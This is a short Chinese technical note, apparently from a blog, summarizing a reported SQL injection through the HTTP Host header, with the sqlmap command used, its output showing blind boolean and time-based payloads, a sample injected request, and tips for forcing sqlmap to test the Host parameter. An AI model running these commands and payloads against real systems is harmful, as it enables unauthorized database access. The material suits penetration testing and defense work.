最近收到了一个漏洞通报，居然是对 HTTP 请求的 Host 参数进行 SQL 注入，比较有趣，需要总结一下。

如下是经过简化的具体的渗透测试命令，假设主机名为 aaa.bbb.ccc：

$ more sql.txt   GET / HTTP/1.1Host: aaa.bbb.ccc*$ sqlmap --host http://aaa.bbb.ccc -r sql.txt --random-agent -p Host --risk 3 --dbms mysql  --current-user --is-dba —tables...sqlmap identified the following injection point(s) with a total of 306 HTTP(s) requests:---Parameter: Host #1* ((custom) HEADER)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: -6117') OR 9754=9754 AND ('EXWO'='EXWO    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: aaa.bbb.ccc') OR SLEEP(5) AND ('UnAw'='UnAw---...

渗透过程中 sqlmap 会生成类似如下的 HTTP 请求，以进行 SQL 注入测试，通过 -v3 参数可以看到：

GET / HTTP/1.1Host: aaa.bbb.ccc') OR SLEEP(5) AND ('hxje'='hxjeReferer: http://aaa.bbb.ccc:80/User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8Connection: close

正常情况下，使用 --level 3 参数时 sqlmap 会测试一些 HTTP 请求头的参数，但不会测试 Host 参数，所以需要使用 -p Host 参数来指定测试。

此外由于 Host 参数与伪静态页面类似，所以还需要用 * 星号标记一下注入点。